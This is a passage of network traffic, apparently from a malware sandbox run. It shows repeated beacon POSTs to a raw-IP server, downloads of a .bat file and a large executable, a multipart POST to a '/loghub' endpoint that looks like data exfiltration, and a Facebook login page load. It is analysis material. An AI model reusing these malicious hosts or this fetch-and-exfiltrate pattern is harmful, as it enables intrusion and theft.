Date: Fri, 03 Nov 2023 04:49:37 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 42
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://qhstgwojgl.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 325
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Fri, 03 Nov 2023 04:49:38 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://bcawldkgor.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 156
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Fri, 03 Nov 2023 04:49:38 GMT
Server: Apache/2.4.41 (Ubuntu)
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://ggydemby.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 347
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Fri, 03 Nov 2023 04:49:38 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://xkqwdkp.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 324
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Fri, 03 Nov 2023 04:49:38 GMT
Server: Apache/2.4.41 (Ubuntu)
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://ablsftk.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 177
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Fri, 03 Nov 2023 04:49:38 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=92
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://xsihclx.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 112
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Fri, 03 Nov 2023 04:49:38 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 44
Keep-Alive: timeout=5, max=91
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
GET

http://77.91.68.249/fuza/3.bat

Remote address:

77.91.68.249:80

Request

GET /fuza/3.bat HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: 77.91.68.249

Response

HTTP/1.1 200 OK

Date: Fri, 03 Nov 2023 04:49:37 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Thu, 26 Oct 2023 20:57:10 GMT
ETag: "156-608a4d0c9149d"
Accept-Ranges: bytes
Content-Length: 342
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program
DNS

29.68.91.77.in-addr.arpa

Remote address:

8.8.8.8:53

Request

29.68.91.77.in-addr.arpa

IN PTR

Response

29.68.91.77.in-addr.arpa

IN PTR

hosted-by yeezyhostnet
POST

http://193.233.255.73/loghub/master

F733.exe

Remote address:

193.233.255.73:80

Request

POST /loghub/master HTTP/1.1
Content-Type: multipart/form-data; boundary=NrBZlBQlT6lwFjiVQA2N
Content-Length: 213
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: 193.233.255.73
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 03 Nov 2023 04:49:39 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 8
Connection: keep-alive
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Referrer-Policy: same-origin
GET

http://5.42.65.80/latestrock.exe

Remote address:

5.42.65.80:80

Request

GET /latestrock.exe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: 5.42.65.80

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 03 Nov 2023 04:49:38 GMT
Content-Type: application/octet-stream
Content-Length: 13144064
Last-Modified: Thu, 02 Nov 2023 18:03:53 GMT
Connection: keep-alive
ETag: "6543e489-c89000"
Accept-Ranges: bytes
DNS

0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa

Remote address:

8.8.8.8:53

Request

0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa

IN PTR

Response
DNS

249.68.91.77.in-addr.arpa

Remote address:

8.8.8.8:53

Request

249.68.91.77.in-addr.arpa

IN PTR

Response

249.68.91.77.in-addr.arpa

IN PTR

hosted-by yeezyhostnet
DNS

73.255.233.193.in-addr.arpa

Remote address:

8.8.8.8:53

Request

73.255.233.193.in-addr.arpa

IN PTR

Response

73.255.233.193.in-addr.arpa

IN PTR

hosted-by yeezyhostnet
DNS

80.65.42.5.in-addr.arpa

Remote address:

8.8.8.8:53

Request

80.65.42.5.in-addr.arpa

IN PTR

Response
DNS

www.facebook.com

MicrosoftEdgeCP.exe

Remote address:

8.8.8.8:53

Request

www.facebook.com

IN A

Response

www.facebook.com

IN CNAME

star-mini.c10r.facebook.com

star-mini.c10r.facebook.com

IN A

157.240.201.35
DNS

177.25.221.88.in-addr.arpa

Remote address:

8.8.8.8:53

Request

177.25.221.88.in-addr.arpa

IN PTR

Response

177.25.221.88.in-addr.arpa

IN PTR

a88-221-25-177deploystaticakamaitechnologiescom
DNS

www.facebook.com

MicrosoftEdgeCP.exe

Remote address:

8.8.8.8:53

Request

www.facebook.com

IN A

Response

www.facebook.com

IN CNAME

star-mini.c10r.facebook.com

star-mini.c10r.facebook.com

IN A

157.240.247.35
GET

https://www.facebook.com/login

MicrosoftEdgeCP.exe

Remote address:

157.240.247.35:443

Request

GET /login HTTP/2.0
host: www.facebook.com
accept: text/html, application/xhtml+xml, image/jxr, */*
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
reporting-endpoints: default="https://www.facebook.com/ajax/browser_error_reports/?device_level=unknown"
report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}
content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com *.fbcdn.net 'unsafe-eval';script-src *.facebook.com *.fbcdn.net 'unsafe-inline' blob: data: 'self' 'unsafe-eval';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(self), geolocation=(self), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(self), midi=(), payment=(), publickey-credentials-get=(self), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: same-origin
cross-origin-opener-policy: unsafe-none
pragma: no-cache
cache-control: private, no-cache, no-store, must-revalidate
expires: Sat, 01 Jan 2000 00:00:00 GMT
x-content-type-options: nosniff
x-xss-protection: 0
x-frame-options: DENY
strict-transport-security: max-age=15552000; preload
content-type: text/html; charset="utf-8"
x-fb-debug: pAOiB0EGjX2DZt6cEqde3OCE5CrdBj9sm2c4mV1A7mUHl6XPls3KaGMrQr47dFVT6ggwoael48YUtlUKi5JIcw==
date: Fri, 03 Nov 2023 04:49:46 GMT
alt-svc: h3=":443"; ma=86400
GET

https://www.facebook.com/images/cookies/cookie_info_card_image_1.png

MicrosoftEdgeCP.exe

Remote address:

157.240.247.35:443

Request

GET /images/cookies/cookie_info_card_image_1.png HTTP/2.0
host: www.facebook.com
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

content-type: image/png
access-control-allow-origin: *
content-md5: Nmnpiyrpc00QHVchkNDJDQ==
edge-control: cache-maxage=86400s
expires: Fri, 03 Nov 2023 23:44:09 GMT
cache-control: public,max-age=86400
reporting-endpoints: default="https://www.facebook.com/ajax/browser_error_reports/?device_level=unknown"
report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(self), geolocation=(self), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(self), midi=(), payment=(), publickey-credentials-get=(self), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin-allow-popups
x-content-type-options: nosniff
timing-allow-origin: *
origin-agent-cluster: ?0
strict-transport-security: max-age=15552000; preload
x-fb-debug: Kiz6v7fef1Dv5LDYAdZNjLqvEjxTcidv61l19gAg3hKqnk4elQqrK5DtBLX3WQx+4F6CD8LfBd6U7gWXZybdOQ==
date: Thu, 02 Nov 2023 23:44:09 GMT
content-length: 22180
GET

https://www.facebook.com/images/cookies/cookie_info_card_image_2.png

MicrosoftEdgeCP.exe

Remote address:

157.240.247.35:443

Request

GET /images/cookies/cookie_info_card_image_2.png HTTP/2.0
host: www.facebook.com
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

content-type: image/png
access-control-allow-origin: *
content-md5: wRZKtl/35CrbFpdeWSFrBg==
edge-control: cache-maxage=86400s
expires: Sat, 04 Nov 2023 02:06:42 GMT
cache-control: public,max-age=86400
reporting-endpoints: default="https://www.facebook.com/ajax/browser_error_reports/?device_level=unknown"
report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(self), geolocation=(self), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(self), midi=(), payment=(), publickey-credentials-get=(self), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin-allow-popups
x-content-type-options: nosniff
timing-allow-origin: *
origin-agent-cluster: ?0
strict-transport-security: max-age=15552000; preload
x-fb-debug: tQWfGHxf/BeGh9aLUV48/PxG/T1dHXMsC62yMiproszLxlludM+uU30VovHKBPC8QpxNsYFBkDo2p6JIf+UYlw==
date: Fri, 03 Nov 2023 02:06:42 GMT
content-length: 21306
GET

https://www.facebook.com/images/cookies/cookie_info_card_image_3.png

MicrosoftEdgeCP.exe

Remote address:

157.240.247.35:443

Request

GET /images/cookies/cookie_info_card_image_3.png HTTP/2.0
host: www.facebook.com
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

content-type: image/png
access-control-allow-origin: *
content-md5: tjvKzjcx509sRQAttysmgw==
edge-control: cache-maxage=86400s
expires: Fri, 03 Nov 2023 10:12:08 GMT
cache-control: public,max-age=86400
reporting-endpoints: default="https://www.facebook.com/ajax/browser_error_reports/?device_level=unknown"
report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(self), geolocation=(self), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(self), midi=(), payment=(), publickey-credentials-get=(self), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin-allow-popups
x-content-type-options: nosniff
timing-allow-origin: *
origin-agent-cluster: ?0
strict-transport-security: max-age=15552000; preload
x-fb-debug: oeZoX71CmpFrtdrEihbcIg3wbqgwKM7813MOHbA2DnYo8mLyhCZwn/gNzsBO6yPs0pgU7mnhM+UhODznBbElDg==
date: Thu, 02 Nov 2023 10:12:08 GMT
content-length: 35554
GET

https://www.facebook.com/images/cookies/cookie_info_card_image_4.png

MicrosoftEdgeCP.exe

Remote address:

157.240.247.35:443

Request

GET /images/cookies/cookie_info_card_image_4.png HTTP/2.0
host: www.facebook.com
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

content-type: image/png
access-control-allow-origin: *
content-md5: mXjbZp5JUjt62zr4DVYbGw==
edge-control: cache-maxage=86400s
expires: Fri, 03 Nov 2023 22:26:09 GMT
cache-control: public,max-age=86400
reporting-endpoints: default="https://www.facebook.com/ajax/browser_error_reports/?device_level=unknown"
report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(self), geolocation=(self), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(self), midi=(), payment=(), publickey-credentials-get=(self), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin-allow-popups
x-content-type-options: nosniff
timing-allow-origin: *
origin-agent-cluster: ?0
strict-transport-security: max-age=15552000; preload
x-fb-debug: CbqDmB821xpO/ITljdx1PCO+tbr8Dnf1rgjtDzDM2e2rFNqnzs1lRyy1a4cm1D/jJT35gSqtKReYMvJD2BQzjQ==
date: Thu, 02 Nov 2023 22:26:09 GMT
content-length: 17083
GET

https://www.facebook.com/images/cookies/cookie_info_popup_image_1.png

MicrosoftEdgeCP.exe

Remote address:

157.240.247.35:443

Request

GET /images/cookies/cookie_info_popup_image_1.png HTTP/2.0
host: www.facebook.com
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

content-type: image/png
access-control-allow-origin: *
content-md5: VavMdY6kTjDMa/KajpYRaQ==
edge-control: cache-maxage=86400s
expires: Fri, 03 Nov 2023 23:49:02 GMT
cache-control: public,max-age=86400
reporting-endpoints: default="https://www.facebook.com/ajax/browser_error_reports/?device_level=unknown"
report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(self), geolocation=(self), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(self), midi=(), payment=(), publickey-credentials-get=(self), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin-allow-popups
x-content-type-options: nosniff
timing-allow-origin: *
origin-agent-cluster: ?0
strict-transport-security: max-age=15552000; preload
x-fb-debug: 761+xHLzDjHxJCgG/Rr3KOOuOom7ePTZtLbkG6EEZprCR3i4ZyKjXrFJHxDQhin9K8m01Edpn1gslU52ij/T6A==
date: Thu, 02 Nov 2023 23:49:02 GMT
content-length: 50380
GET

https://www.facebook.com/images/cookies/cookie_info_popup_image_2.png

MicrosoftEdgeCP.exe

Remote address:

157.240.247.35:443

Request

GET /images/cookies/cookie_info_popup_image_2.png HTTP/2.0
host: www.facebook.com
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

content-type: image/png
access-control-allow-origin: *
content-md5: vq/Hc42i1NUD0re9tbXumw==
edge-control: cache-maxage=86400s
expires: Fri, 03 Nov 2023 19:20:57 GMT
cache-control: public,max-age=86400
reporting-endpoints: default="https://www.facebook.com/ajax/browser_error_reports/"
report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}]}
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(self), geolocation=(self), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(self), midi=(), payment=(), publickey-credentials-get=(self), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin-allow-popups
x-content-type-options: nosniff
timing-allow-origin: *
strict-transport-security: max-age=15552000; preload
x-fb-debug: q2CcaBSwq+jcqoMaMxGYyMlwViiR3DWwa7Iju5sv3lFJgG/yDrHVKBcntrpaBdrt+mpP6iRq2EBdGBe1j78PHA==
date: Thu, 02 Nov 2023 19:20:57 GMT
content-length: 47514
GET

https://www.facebook.com/images/cookies/cookie_info_popup_image_3.png

MicrosoftEdgeCP.exe

Remote address:

157.240.247.35:443

Request

GET /images/cookies/cookie_info_popup_image_3.png HTTP/2.0
host: www.facebook.com
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

content-type: image/png
access-control-allow-origin: *
content-md5: YhcU5SV/bTVsWSaxO4wgGA==
edge-control: cache-maxage=86400s
expires: Fri, 03 Nov 2023 05:04:30 GMT
cache-control: public,max-age=86400
reporting-endpoints: default="https://www.facebook.com/ajax/browser_error_reports/"
report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}]}
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(self), geolocation=(self), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(self), midi=(), payment=(), publickey-credentials-get=(self), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin-allow-popups
x-content-type-options: nosniff
timing-allow-origin: *
strict-transport-security: max-age=15552000; preload
x-fb-debug: MlWghS/FMDdNynla6sb0c2Abr0Ymx3MAi+Cy6MXwJNaISdLVmgmWEvZy9RmbFrPs2+TqhRJuhgZ4+kSJJAoFQw==
date: Thu, 02 Nov 2023 05:04:30 GMT
content-length: 47657
GET

https://www.facebook.com/images/cookies/cookie_info_popup_image_4.png

MicrosoftEdgeCP.exe

Remote address:

157.240.247.35:443

Request

GET /images/cookies/cookie_info_popup_image_4.png HTTP/2.0
host: www.facebook.com
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

content-type: image/png
access-control-allow-origin: *
content-md5: Ae8VnBRpCv1xxClCp11bLQ==
edge-control: cache-maxage=86400s
expires: Fri, 03 Nov 2023 05:01:07 GMT
cache-control: public,max-age=86400
reporting-endpoints: default="https://www.facebook.com/ajax/browser_error_reports/"
report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}]}
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(self), geolocation=(self), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(self), midi=(), payment=(), publickey-credentials-get=(self), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin-allow-popups
x-content-type-options: nosniff
timing-allow-origin: *
strict-transport-security: max-age=15552000; preload
x-fb-debug: AFp79nwmapJq7YbcgVMm1phstcvOagmrSzuQglvgVSgZyBSsUZAw8hZ5zoDIhodPPN2v9YEO25BoF9eG8Vreyg==
date: Thu, 02 Nov 2023 05:01:07 GMT
content-length: 38147
POST

https://www.facebook.com/ajax/bz?__a=1&__aaid=0&__ccg=EXCELLENT&__dyn=7xe6E5aQ1PyUbFuC1swgE98nwgU6C7UW3q327E2vwXw5ux60Vo1upE4W0OE2WxO2O1Vw8G1Qw5Mx61vw5zwwwi81nE1u83mwaS0zK1swc-0lK3qaw4kwbS1Lw4Cwcq&__hs=19664.BP%3ADEFAULT.2.0..0.0&__hsi=7297093542137434357&__req=1&__rev=1009667778&__s=%3A%3A33ib9c&__spin_b=trunk&__spin_r=1009667778&__spin_t=1698986986&__user=0&dpr=1&jazoest=21030&lsd=AVrHoFl_hxU

MicrosoftEdgeCP.exe

Remote address:

157.240.247.35:443

Request

POST /ajax/bz?__a=1&__aaid=0&__ccg=EXCELLENT&__dyn=7xe6E5aQ1PyUbFuC1swgE98nwgU6C7UW3q327E2vwXw5ux60Vo1upE4W0OE2WxO2O1Vw8G1Qw5Mx61vw5zwwwi81nE1u83mwaS0zK1swc-0lK3qaw4kwbS1Lw4Cwcq&__hs=19664.BP%3ADEFAULT.2.0..0.0&__hsi=7297093542137434357&__req=1&__rev=1009667778&__s=%3A%3A33ib9c&__spin_b=trunk&__spin_r=1009667778&__spin_t=1698986986&__user=0&dpr=1&jazoest=21030&lsd=AVrHoFl_hxU HTTP/2.0
host: www.facebook.com
accept: */*
origin: https://www.facebook.com
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
content-type: multipart/form-data; boundary=---------------------------7e77a282044a
accept-encoding: gzip, deflate, br
content-length: 891
cache-control: no-cache

Response

HTTP/2.0 200

reporting-endpoints: default="https://www.facebook.com/ajax/browser_error_reports/?device_level=unknown"
report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}
content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com *.fbcdn.net 'unsafe-eval';script-src *.facebook.com *.fbcdn.net 'unsafe-inline' blob: data: 'self' 'unsafe-eval';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(self), geolocation=(self), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(self), midi=(), payment=(), publickey-credentials-get=(self), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin-allow-popups
pragma: no-cache
cache-control: private, no-cache, no-store, must-revalidate
expires: Sat, 01 Jan 2000 00:00:00 GMT
x-content-type-options: nosniff
x-xss-protection: 0
x-frame-options: DENY
access-control-expose-headers: X-FB-Debug, X-Loader-Length
access-control-allow-methods: OPTIONS
access-control-allow-credentials: true
access-control-allow-origin: https://www.facebook.com
vary: Origin
strict-transport-security: max-age=15552000; preload
content-type: text/html; charset="utf-8"
x-fb-debug: zAoIC9dYChjCV7qkPG8yks5/Odx9eSrFeM3cR+dbkio/IhhhQDLxIzRWZ0vhz6NLivZ+deJ2cGdClQZLT3WnQQ==
content-length: 0
date: Fri, 03 Nov 2023 04:50:43 GMT
alt-svc: h3=":443"; ma=86400
POST

https://www.facebook.com/ajax/bz?__a=1&__aaid=0&__ccg=EXCELLENT&__dyn=7xe6E5aQ1PyUbFuC1swgE98nwgU6C7UW3q327E2vwXw5ux60Vo1upE4W0OE2WxO2O1Vw8G1Qw5Mx61vw5zwwwi81nE1u83mwaS0zK1swc-0lK3qaw4kwbS1Lw4Cwcq&__hs=19664.BP%3ADEFAULT.2.0..0.0&__hsi=7297093542137434357&__req=2&__rev=1009667778&__s=%3A%3A33ib9c&__spin_b=trunk&__spin_r=1009667778&__spin_t=1698986986&__user=0&dpr=1&jazoest=21030&lsd=AVrHoFl_hxU

MicrosoftEdgeCP.exe

Remote address:

157.240.247.35:443

Request

POST /ajax/bz?__a=1&__aaid=0&__ccg=EXCELLENT&__dyn=7xe6E5aQ1PyUbFuC1swgE98nwgU6C7UW3q327E2vwXw5ux60Vo1upE4W0OE2WxO2O1Vw8G1Qw5Mx61vw5zwwwi81nE1u83mwaS0zK1swc-0lK3qaw4kwbS1Lw4Cwcq&__hs=19664.BP%3ADEFAULT.2.0..0.0&__hsi=7297093542137434357&__req=2&__rev=1009667778&__s=%3A%3A33ib9c&__spin_b=trunk&__spin_r=1009667778&__spin_t=1698986986&__user=0&dpr=1&jazoest=21030&lsd=AVrHoFl_hxU HTTP/2.0
host: www.facebook.com
accept: */*
origin: https://www.facebook.com
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
